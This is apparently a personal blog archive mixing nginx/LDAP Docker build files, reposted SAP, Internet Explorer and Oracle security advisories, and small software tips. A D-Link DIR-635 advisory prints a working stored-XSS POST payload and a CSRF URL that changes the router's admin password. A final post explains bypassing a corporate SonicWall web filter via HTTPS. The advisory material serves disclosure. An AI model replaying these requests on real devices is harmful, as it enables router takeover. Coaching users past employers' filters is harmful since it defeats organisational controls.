Monday, September 8, 2014

Dockerize Nginx with LDAP support

Nginx, by default, doesn't come with LDAP integration. There is a third-party add-on module, nginx-auth-ldap, that adds it.

I've recently been tasked to come up with an implementation of this using Docker virtualization technology and just wanted to share this so others won't have to go through the same process I did when I was testing this out.

Dockerfile content below:
# Nginx-Auth-LDAP Dockerfile

FROM ubuntu:latest

RUN apt-get update
RUN apt-get install -y wget build-essential libldap2-dev libssl-dev zlib1g-dev libpcre3 libpcre3-dev git libc6 libexpat1 libgd2-xpm-dev libgeoip1 libgeoip-dev libpam0g libssl1.0.0 libxml2 libxslt1.1 libxslt-dev zlib1g perl openssl
RUN cd /root && wget http://nginx.org/download/nginx-1.6.0.tar.gz && tar xvzf nginx-1.6.0.tar.gz
RUN cd /root/nginx-1.6.0 && git clone https://github.com/kvspb/nginx-auth-ldap.git
RUN mkdir -p /opt/nginx

ADD config /root/nginx-1.6.0/nginx-auth-ldap/config

RUN cd /root/nginx-1.6.0 && ./configure --prefix=/opt/nginx --user=www-data --group=www-data --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_gzip_static_module --with-http_stub_status_module --add-module=nginx-auth-ldap && make && make install 

ADD nginx /etc/init.d/nginx

RUN chmod +x /etc/init.d/nginx
ADD nginx.conf /opt/nginx/conf/nginx.conf

VOLUME ["/data", "/opt/nginx/sites-enabled", "/opt/nginx/log"]
EXPOSE 8000

WORKDIR /opt/nginx

# nginx must stay in the foreground: if the container's PID 1 is the init script,
# it returns as soon as nginx daemonises and the container exits immediately.
# The init script added above remains usable for a manual start/stop/reload.
CMD ["/opt/nginx/sbin/nginx", "-g", "daemon off;"]

config file content (the nginx-auth-ldap module's build config, which the Dockerfile copies into the module directory before running ./configure):
ngx_addon_name=ngx_http_auth_ldap_module
HTTP_MODULES="$HTTP_MODULES ngx_http_auth_ldap_module"
NGX_ADDON_SRCS="$NGX_ADDON_SRCS $ngx_addon_dir/ngx_http_auth_ldap_module.c"
CORE_LIBS="$CORE_LIBS -lldap -llber"
case "$NGX_PLATFORM" in
   SunOS:*)
       CORE_LIBS="$CORE_LIBS -llber"
   ;;
esac
CFLAGS="$CFLAGS"

nginx.conf file content:
# must match the pidfile the init script uses, otherwise stop/reload cannot find nginx
pid  /var/run/nginx.pid;

worker_processes  1;

events {
    worker_connections  1024;
}

http {
    ldap_server test1 {
        url ldap://ldapurl/DC=maindc,DC=com?sAMAccountName?sub?(objectClass=person);
        binddn "cn=root";
        binddn_passwd password;
        group_attribute uniquemember;
        group_attribute_is_dn on;
        require valid_user;
    }

    server {
        listen       8000;
        server_name  localhost;

        auth_ldap "Forbidden";
        auth_ldap_servers test1;

        location / {
            root   html;
            index  index.html index.htm;
        }
    }
}

nginx file content:
#! /bin/sh
### BEGIN INIT INFO
# Provides:          nginx
# Required-Start:    $all
# Required-Stop:     $all
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: starts the nginx web server
# Description:       starts nginx using start-stop-daemon
### END INIT INFO
PATH=/opt/nginx/sbin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
DAEMON=/opt/nginx/sbin/nginx
NAME=nginx
DESC=nginx
test -x $DAEMON || exit 0
# Include nginx defaults if available
if [ -f /etc/default/nginx ] ; then
  . /etc/default/nginx
fi
set -e
case "$1" in
  start)
  echo -n "Starting $DESC: "
  start-stop-daemon --start --quiet --pidfile /var/run/$NAME.pid \
    --exec $DAEMON -- $DAEMON_OPTS
  echo "$NAME."
  ;;
  stop)
  echo -n "Stopping $DESC: "
  start-stop-daemon --stop --quiet --pidfile /var/run/$NAME.pid \
    --exec $DAEMON
  echo "$NAME."
  ;;
  restart|force-reload)
  echo -n "Restarting $DESC: "
  start-stop-daemon --stop --quiet --pidfile \
    /var/run/$NAME.pid --exec $DAEMON
  sleep 1
  start-stop-daemon --start --quiet --pidfile \
    /var/run/$NAME.pid --exec $DAEMON -- $DAEMON_OPTS
  echo "$NAME."
  ;;
  reload)
      echo -n "Reloading $DESC configuration: "
      start-stop-daemon --stop --signal HUP --quiet --pidfile /var/run/$NAME.pid \
          --exec $DAEMON
      echo "$NAME."
      ;;
  *)
  N=/etc/init.d/$NAME
  echo "Usage: $N {start|stop|restart|reload|force-reload}" >&2
  exit 1
  ;;
esac
exit 0
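Once the four files above are in place, the thing worth checking is that the build really enforces authentication rather than silently serving everything. The smoke test below is an added example, not part of the original post or of the nginx-auth-ldap project. It assumes docker and curl are installed, that the Dockerfile, config, nginx.conf and nginx init script sit in the current directory, and that LDAP_USER and LDAP_PASS hold a test account that exists on the directory named in nginx.conf (all of these names are the example's own).

```shell
#!/bin/sh
# Added example, not from the original post: build the image from the files
# above and check that the LDAP-protected site rejects anonymous requests
# and admits a valid directory user.
# Assumptions: Dockerfile, config, nginx.conf and the nginx init script are in
# the current directory; docker and curl are installed; LDAP_USER/LDAP_PASS
# hold a test account on the server named in nginx.conf.

IMAGE=${IMAGE:-nginx-auth-ldap}
CONTAINER=${CONTAINER:-nginx-ldap-smoke}
PORT=${PORT:-8000}

# Return the HTTP status code for a URL, with optional basic-auth "user:pass".
http_status() {
    if [ -n "${2:-}" ]; then
        curl -s -o /dev/null -w '%{http_code}' -u "$2" "$1"
    else
        curl -s -o /dev/null -w '%{http_code}' "$1"
    fi
}

# Authentication is enforced only when the anonymous request is challenged
# (401) and the authenticated one succeeds (200). A 200 for both means the
# module is not active; 500/502 usually means the LDAP server is unreachable.
auth_enforced() {
    [ "$1" = "401" ] && [ "$2" = "200" ]
}

# Human-readable verdict for a pair of status codes (anonymous, authenticated).
describe() {
    if auth_enforced "$1" "$2"; then
        echo "ok: anonymous=$1 authenticated=$2"
    elif [ "$1" = "200" ]; then
        echo "FAIL: anonymous request served without authentication"
    elif [ "$1" = "401" ] && [ "$2" = "401" ]; then
        echo "FAIL: valid credentials rejected (check url/binddn in nginx.conf)"
    else
        echo "FAIL: anonymous=$1 authenticated=$2 (LDAP server reachable?)"
    fi
}

# Build, start, probe twice, tear down, report.
smoke_test() {
    docker build -t "$IMAGE" . || return 1
    docker run -d --name "$CONTAINER" -p "$PORT:8000" "$IMAGE" >/dev/null || return 1
    sleep 2
    anon=$(http_status "http://localhost:$PORT/")
    user=$(http_status "http://localhost:$PORT/" "$LDAP_USER:$LDAP_PASS")
    docker rm -f "$CONTAINER" >/dev/null
    describe "$anon" "$user"
    auth_enforced "$anon" "$user"
}

# Only run the container test when asked to, so the helpers can be sourced.
if [ "${1:-}" = "run" ]; then
    smoke_test
fi
```

Run it as `sh smoke.sh run`. Note that, exactly like the post's configuration, this sends the HTTP basic-auth credentials and the LDAP bind in clear text (plain HTTP on port 8000 and an ldap:// URL); for anything beyond a lab, terminate TLS on nginx and point the module at an ldaps:// URL so neither the user's password nor the bind password crosses the network unencrypted.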

Tuesday, August 5, 2014

SAP HANA XS Missing encryption in form-based authentication

Onapsis Security Advisory 2014-021: SAP HANA XS Missing encryption in
form-based authentication

This advisory can be downloaded in PDF format from
http://www.onapsis.com/.

1. Impact on Business

SAP HANA XS does not enforce any encryption in the form-based authentication. It could allow an anonymous user to obtain information such as valid credentials from network traffic, gaining access to the system.

Risk Level: Low

2. Advisory Information

- Public Release Date: 2014-07-29
- Subscriber Notification Date: 2014-07-29
- Last Revised: 2014-07-25
- Security Advisory ID: ONAPSIS-2014-021
- Onapsis SVS ID: ONAPSIS-0094
- Researcher: Sergio Abraham, Manuel Muradas
- Initial Base CVSS v2: 2.9 (AV:A/AC:M/AU:N/C:P/I:N/A:N)

3. Vulnerability Information

- Vendor: SAP
- Affected Components:
- SAP HANA Extended Application Services (Check SAP Note 1963932 for detailed information on affected releases)
- Vulnerability Class: Cleartext Transmission of Sensitive Information (CWE-319)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Detection Module available in Onapsis X1: Yes
- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-021

4. Affected Components Description

SAP HANA Extended Application Services (XS) is an application server, web server and development environment for web applications within the SAP HANA system. SAP HANA XS is fully integrated with the SAP HANA database.

5. Vulnerability Details

SAP HANA Extended Application Services (XS) based applications can be configured for "form-based authentication" access using SSL. When this configuration is set, the authentication mechanism does not properly enforce the required level of encryption.

Technical details about this issue are not disclosed at this moment, with the purpose of providing enough time for affected customers to patch their systems and protect against the exploitation of the described vulnerability.

6. Solution

SAP has released SAP Note 1963932, which provides patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/1963932.

Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks.

Tuesday, July 29, 2014

Multiple Hard-coded Usernames in SAP components

Onapsis Security Advisories: Multiple Hard-coded Usernames (CWE-798) have
been found and patched in a variety of SAP components.
Summaries of the advisories with links to full versions follow:

1. ONAPSIS-2014-011-SAP Project System Structures and Project-Oriented Procurement Hard-coded credentials
=======================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Affected Components:
    * Project System
    * Structures
    * Project-Oriented Procurement
    (Check SAP Note 1791081 for detailed information on affected releases)

-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-011


2. ONAPSIS-2014-012-SAP Brazil Specific Add-On Hard-coded Credentials
=====================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2: 4.0 (AV:N/AC:L/AU:S/C:P/I:N/A:N)
-- Fix in SAP Note: 1768049
-- Affected Components:
    * Brazil Specific Add-On

-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-012


3. ONAPSIS-2014-013-SAP OIL Industry Solution Traders and Schedulers Workbench Hard-coded Credentials
=====================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2:  4.6 (AV:N/AC:H/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1920323
-- Affected Components:
    * SAP Oil Industry Solution Traders and Schedulers Workbench

-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-013


4. ONAPSIS-2014-014-SAP Upgrade tools for ABAP Hard-coded credentials
=====================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2:  4.9 (AV:N/AC:M/AU:S/C:N/I:P/A:P)
-- Fix in SAP Note: 1915873
-- Affected Components:
    * SAP Upgrade Tools

-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-014


5. ONAPSIS-2014-015-SAP Web Services Tool Hard-coded Credentials
================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2:  3.5 (AV:N/AC:M/AU:S/C:P/I:N/A:N)
-- Fix in SAP Note: 1914777
-- Affected Components:
    * SAP Web Services Tool

-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-015


6. ONAPSIS-2014-016-SAP CCMS Monitoring Hard-coded Credentials
==============================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2:  6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1911174
-- Affected Components:
    * SAP CCMS Monitoring

-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-016


7. ONAPSIS-2014-017-SAP Transaction Data Pool Hard-coded Credentials
====================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2:  6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1795463
-- Affected Components:
    * SAP Transaction Data Pool

-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-017


8. ONAPSIS-2014-018-SAP Capacity Leveling Hard-coded Credentials
================================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2:  6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)
-- Fix in SAP Note: 1789569
-- Affected Components:
    * SAP Capacity Leveling

-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-018


9. ONAPSIS-2014-019-SAP Open Hub Service Hard-coded Credentials
===============================================================
-- Public Release Date: 2014-06-06
-- Researcher: Sergio Abraham
-- Initial Base CVSS v2:  4.9 (AV:N/AC:M/AU:S/C:P/I:P/A:N)
-- Fix in SAP Note: 1738965
-- Affected Components:
    * SAP Open Hub Service

-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-019

SAP SLD Information Tampering

Onapsis Security Advisory 2014-020: SAP SLD Information Tampering

1. Impact on Business
=====================
By exploiting this vulnerability, a remote unauthenticated attacker might be able to modify technical information about the SAP systems, potentially leading to a full compromise of all business information.

Risk Level: High

2. Advisory Information
=======================
-- Public Release Date: 2014-06-06
-- Subscriber Notification Date: 2014-06-06
-- Last Revised: 2014-06-06
-- Security Advisory ID: ONAPSIS-2014-020
-- Onapsis SVS ID: ONAPSIS-SVS00081
-- Researchers: Jordan Santarsieri, Pablo Muller, Juan Perez-Etchegoyen
-- Initial Base CVSS v2:  6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

3. Vulnerability Information
============================
-- Vendor: SAP
-- Affected Components:
    * SAP System Landscape Directory (available in all SAP JAVA App Servers)
      (Check SAP Note 1939334 for detailed information on affected releases)
-- Vulnerability Class: Improper Handling of Insufficient Permissions
or Privileges (CWE-280)
-- Remotely Exploitable: Yes
-- Locally Exploitable: No
-- Authentication Required: No
-- Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-020

4. Affected Components Description
==================================
According to the vendor, "The System Landscape Directory (SLD) of SAP NetWeaver is the central source of system landscape information relevant for the management of your software life-cycle" [1].

5. Vulnerability Details
========================
The SLD is a central repository of technical and SAP systems-related information. The mechanism used to add new systems to the SLD is not properly secured by default, meaning that a remote unauthenticated attacker could interact with the SLD and, because of its architectural design, this could lead to a full SAP SLD system compromise.

Technical details about this issue are not disclosed at this moment, with the purpose of providing enough time for affected customers to patch their systems and protect against the exploitation of the described vulnerability.

6. Solution
===========
SAP has released SAP Note 1939334, which provides patched versions of the affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/1939334.

Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks.

Thursday, January 9, 2014

Hack in the Box Magazine

I'm an avid reader of eBooks and IT Security has taken my curiosity for quite a while now. There are a number of online forums and references available and a few sites that serve as testing ground for would-be IT Security enthusiasts. Right now though what caught my attention is a site that caters for a free version of their magazine HITB Magazine.


True to the idea of the Open Source community, this site offers this knowledge-rich reference for free. So far, they have been able to release issues on a regular basis (I wonder though how long that will last). It's like an FHM for hackers :) and I'd recommend it for people who want to get updated on the who's who and what's what of the IT Security world.

Tuesday, November 26, 2013

Connecting to Cisco WebexConnect using Jabber

It's been twice that I had to Google this thing so I'm putting it up on my blog for future reference. :)

Username: {site username}
Password: {obviously...}
Host: c2s.{your domain}.webexconnect.com
(note: if your domain is something like site.com, then include the .com here)
Port: 5222

Saturday, May 4, 2013

VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 "CDisplayPointer" Use-after-free (MS13-028)

VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6
"CDisplayPointer" Use-after-free (MS13-028)

Website : http://www.vupen.com

Twitter : http://twitter.com/vupen


I. BACKGROUND
---------------------

"Microsoft Internet Explorer is a web browser developed by Microsoft and
included as part of the Microsoft Windows line of operating systems with
more than 60% of the worldwide usage share of web browsers." (Wikipedia)


II. DESCRIPTION
---------------------

VUPEN Vulnerability Research Team discovered a critical vulnerability
in Microsoft Internet Explorer.

The vulnerability is caused by a use-after-free error in the
"CDisplayPointer::MoveToMarkupPointer()" function within mshtml.dll when
processing "CDisplayPointer" objects, which could be exploited by remote
attackers to compromise a vulnerable system via a malicious web page.


III. AFFECTED PRODUCTS
---------------------------

Microsoft Internet Explorer 10
Microsoft Internet Explorer 9
Microsoft Internet Explorer 8
Microsoft Internet Explorer 7
Microsoft Internet Explorer 6

Microsoft Windows RT
Microsoft Windows 8 for 32-bit Systems
Microsoft Windows 8 for x64-based Systems
Microsoft Windows Server 2012
Microsoft Windows 7 for 32-bit Systems
Microsoft Windows 7 for 32-bit Systems Service Pack 1
Microsoft Windows 7 for x64-based Systems
Microsoft Windows 7 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 for 32-bit Systems
Microsoft Windows Server 2008 for 32-bit Systems Service Pack 2
Microsoft Windows Server 2008 for x64-based Systems
Microsoft Windows Server 2008 for x64-based Systems Service Pack 2
Microsoft Windows Server 2008 for Itanium-based Systems
Microsoft Windows Server 2008 for Itanium-based Systems Service Pack 2
Microsoft Windows Server 2008 R2 for x64-based Systems
Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 R2 for Itanium-based Systems
Microsoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
Microsoft Windows Vista Service Pack 1
Microsoft Windows Vista Service Pack 2
Microsoft Windows Vista x64 Edition Service Pack 1
Microsoft Windows Vista x64 Edition Service Pack 2
Microsoft Windows Server 2003 Service Pack 2
Microsoft Windows Server 2003 x64 Edition Service Pack 2
Microsoft Windows Server 2003 with SP2 for Itanium-based Systems
Microsoft Windows XP Service Pack 3
Microsoft Windows XP Professional x64 Edition Service Pack 2


IV. Binary Analysis & Exploits/PoCs
---------------------------------------

In-depth technical analysis of the vulnerability and a fully functional
remote code execution exploit are available through the VUPEN BAE
(Binary Analysis & Exploits) portal:

http://www.vupen.com/english/services/ba-index.php

VUPEN Binary Analysis & Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit.

The service allows governments and major corporations to evaluate risks, and
protect infrastructures and assets against new threats. The service also
allows security vendors (IPS, IDS, AntiVirus) to supplement their internal
research efforts and quickly develop both vulnerability-based and
exploit-based signatures to proactively protect their customers from attacks
and emerging threats.


V. VUPEN Threat Protection Program
-----------------------------------

Governments and major corporations which are members of the VUPEN Threat Protection Program (TPP) have been proactively alerted about the vulnerability when it was discovered by VUPEN, in advance of its public disclosure, and have received detailed attack detection guidance to protect national and critical infrastructures against potential 0-day attacks exploiting this vulnerability:

http://www.vupen.com/english/services/tpp-index.php


VI. SOLUTION
----------------

Apply MS13-028 security updates.


VII. CREDIT
--------------

This vulnerability was discovered by Nicolas Joly of VUPEN Security


VIII. ABOUT VUPEN Security
---------------------------

VUPEN is the leading provider of defensive and offensive cybersecurity
intelligence and advanced vulnerability research. VUPEN solutions enable
corporations and governments to manage risks, and protect critical networks
and infrastructures against known and unknown vulnerabilities.

VUPEN solutions include:

* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/services/ba-index.php

* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/services/tpp-index.php


IX. REFERENCES
----------------------

http://www.adobe.com/support/security/bulletins/apsb13-11.html
http://www.vupen.com/english/research.php


X. DISCLOSURE TIMELINE
-----------------------------

2012-04-05 - Vulnerability Discovered by VUPEN and shared with VUPEN TPP customers
2013-04-09 - MS13-028 Released By Microsoft
2013-05-02 - Public disclosure

NGS00415 Patch Notification: Oracle 11g TNS listener remote Null Pointer Dereference (pre-auth)

High Risk Vulnerability in Oracle Database 11g

1 May 2013

Andy Davis of NCC Group has discovered a High risk vulnerability in Oracle Database 11g

Impact: Null Pointer Dereference (Remote DoS)

Versions affected:  Oracle Database 11g

Security patch information can be found at the following URL:
http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html

NCC Group is going to withhold details of this flaw for three months. This three month window will allow users the time needed to apply the patch before the details are released to the general public. This reflects the NCC Group approach to responsible disclosure.

NCC Group Research
http://www.nccgroup.com/research

Sunday, April 28, 2013

Security Advisory : Multiple Vulnerabilities in D'Link DIR-635


============ Vulnerable Firmware Releases: ============

Firmware version: 2.34EU
Hardware version: B1
Product page: DIR-635

============ Vulnerability Overview: ============

* Stored XSS -> Status - WLAN -> SSID

Injecting scripts into the parameter config.wireless%5B0%5D.ssid_profiles%5B0%5D.ssid reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

Place the Code via Setup -> Wireless -> Wireless Network Name

POST /Basic/Wireless.shtml HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.0.1/Basic/Wireless.shtml
Content-Type: application/x-www-form-urlencoded
Content-Length: 2307

config.wireless%5B0%5D.radio_control=1&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wlan_schedule_name=Always&config.wireless%5B0%5D.ssid_profiles%5B0%5D.ssid=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%282%29%3E&config.wireless%5B0%5D.erp_protection=true&config.wireless%5B0%5D.phy_mode=11&config.wireless%5B0%5D.auto_channel=true&config.wireless%5B0%5D.channel=6&config.wireless%5B0%5D.tx_rate=0&config.wireless%5B0%5D.cwm_mode=0&config.wireless%5B0%5D.num_streams=65535&config.wireless%5B0%5D.ssid_profiles%5B0%5D.invisibility=0&wireless_invisibility_radio_0=0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.qos=0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wepon=false&config.wireless%5B0%5D.ssid_profiles%5B0%5D.ieee8021x_enabled=false&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wpa_enabled=true&config.wireless%5B0%5D.ssid_profiles%5B0%5D.keylen=1&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wep_key_type=0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wep_key%5B0%5D=12345678902551234567890255&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wep_key%5B1%5D=12345678902551234567890255&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wep_key%5B2%5D=12345678902551234567890255&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wep_key%5B3%5D=12345678902551234567890255&config.wireless%5B0%5D.ssid_profiles%5B0%5D.use_key=0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.auth=1&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wpa_mode=2&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wpa_cipher=3&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wpa_rekey_time=3600&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wpa_psk=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281%29%3E&config.wireless%5B0%5D.ssid_profiles%5B0%5D.ieee8021x_reauth_time=60&config.wireless%5B0%5D.ssid_profiles%5B0%5D.radius_server_address=0.0.0.0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.radius_server_port=1812&config.wireless%5B0%5D.ssid_profiles%5B0%5D.radius_shared_secret=radius_shared&config.wireless%5B0%5D.ssid_profiles%5B0%5D.radius_auth_mac=true&config.wireless%5B0%5D.ssid_profiles%5B0%5D.second_radius_server_address=0.0.0.0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.second_radius_server_port=1812&config.wireless%5B0%5D.ssid_profiles%5B0%5D.second_radius_shared_secret=radius_shared&config.wireless%5B0%5D.ssid_profiles%5B0%5D.second_radius_auth_mac=true

The code gets executed via Status -> Device Information:
http://Target-IP/Status/Device_Info.shtml

* reflected XSS via Extras -> system Check -> Ping

Injecting scripts into the parameter data reveals that this parameter is not properly validated for malicious input.

* Changing the password does not require entering the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:

http://Target-IP/Tools/Admin.shtml?config.password=admin1&config.user_password=&config.gw_name=D-Link+Systems+DIR-635&config.web_server_idle_timeout=5&config.graph_auth=false&config.web_server_allow_https=false&config.web_server_allow_wan_http=false&config.web_server_allow_wan_https=false&config.web_server_wan_port_http=8080&config.web_server_wan_port_https=8181&config.wan_web_ingress_filter_name=Allow+All&wan_ingress_filter_details=Allow+All

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-013
Twitter: @s3cur1ty_de

============ Time Line: ============

November 2012 - discovered vulnerability
11.11.2012 - contacted D-Link via the web interface http://www.dlink.com/us/en/support/contact-support
20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link
21.12.2012 - D-link responded that they will check the findings
11.01.2013 - requested status update
25.01.2013 - requested status update
25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix
25.04.2013 - public release

Replace Eclipse Splash Screen

At work, we are currently using a modified version of the Eclipse IDE, so whenever I open Eclipse I see the company's logo. If you're the type of person who likes to personalize stuff (like me) you can change the Eclipse IDE's default splash screen following the directions below:

1. (This step may be necessary in some distributions, especially for modified versions of Eclipse, but is not really that important if the file used is still the default.) Navigate to the Eclipse configuration file, normally located at the path below:

{eclipseBaseDirectory}\configuration\config.ini

2. Check the location of the splash image as defined in the configuration file (should look like the one below):

osgi.splashPath=platform\:/base/plugins/org.eclipse.platform

Note: The path above is the default path of the splash image, hence if the version of Eclipse that you are using is not modified, chances are the splash image should be here.

3. Navigate to the path defined in the configuration file and replace the file named "splash.bmp"

4. Restart Eclipse and voila!
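For a modified Eclipse the osgi.splashPath value may point somewhere other than the default plugin, so resolving it from config.ini rather than guessing saves a wrong replacement. The script below is an added example, not part of the original post: it reads the value, resolves the "platform:/base/" prefix against the install directory and swaps the image while keeping a backup of the original. It assumes a Unix-style Eclipse install whose base directory is passed as the first argument; the function names and the splash.bmp.orig backup name are the example's own.

```shell
#!/bin/sh
# Added example, not from the original post: resolve the splash image location
# from config.ini and replace it, keeping a backup of the old image.
# Assumes a Unix-style Eclipse install; $1 is the directory that contains
# configuration/config.ini (assumption, pass your own path).

# Read the raw osgi.splashPath value from a config.ini file.
splash_path_value() {   # $1 = path to config.ini
    sed -n 's/^osgi\.splashPath=//p' "$1" | head -n 1
}

# Turn a raw osgi.splashPath value into the directory holding splash.bmp.
# The properties file escapes ':' as '\:', so backslashes are dropped first;
# "platform:/base/" means "relative to the Eclipse install directory".
# Any other value is taken as-is, which is what a relocated splash uses.
splash_dir() {          # $1 = eclipse base dir, $2 = raw osgi.splashPath value
    value=$(printf '%s' "$2" | tr -d '\\')
    case "$value" in
        platform:/base/*) printf '%s/%s' "$1" "${value#platform:/base/}" ;;
        *)                printf '%s' "$value" ;;
    esac
}

# Replace splash.bmp in the resolved directory, backing up the original once.
replace_splash() {      # $1 = eclipse base dir, $2 = new image file
    dir=$(splash_dir "$1" "$(splash_path_value "$1/configuration/config.ini")")
    [ -f "$dir/splash.bmp" ] || { echo "no splash.bmp in $dir" >&2; return 1; }
    [ -f "$dir/splash.bmp.orig" ] || cp "$dir/splash.bmp" "$dir/splash.bmp.orig"
    cp "$2" "$dir/splash.bmp"
}
```

Usage: `replace_splash /opt/eclipse ~/my-splash.bmp`, then restart Eclipse; restoring is a matter of copying splash.bmp.orig back.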






Friday, April 26, 2013

Saving and Restoring your session's Tabs in Chrome

I'm the kind of person that tends to keep huge numbers of tabs open, either for future reading or just 'cause I know I'll be using them later on. With Firefox, this is a mess, 'cause if one of the tabs stops responding you'll have to kill the entire session and relaunch the entire browser. With Chrome and IE though, the system treats each tab as a separate instance of the application. Hence, when one of the tabs becomes unstable, you can just kill that specific instance and keep the rest alive.

The problem is if it is the PC itself that becomes unresponsive. Well, Chrome has something that can deal with this (sort of...).


Tab Saver is a Chrome add-on I recently added to my Chrome portable. Available for download here. It saves your tab list to your disk so you can open it later. The add-on, by the way, detects the open tabs per window. So if you have tab groups open on multiple Chrome windows, you can save them separately and then open them later on for viewing.

Saturday, April 20, 2013

Bypass SonicWall Internet firewall without using Proxy

Say you want to browse a website but your IT has set a restriction on viewing some websites within your corporate network. You can always use a proxy, but this would undermine the security of your browsing (what proxy servers do is become a "middle-man" for the internet traffic when you use them, sending the data you send to the website on your behalf and serving the data returned by the website back to you). One such example: SonicWall (and some other web access restriction firewalls) can be easily tricked (if not set up properly by your IT) by browsing the "secure" version of the website.

Example:
http://www.facebook.com


Change the URL to:
https://www.facebook.com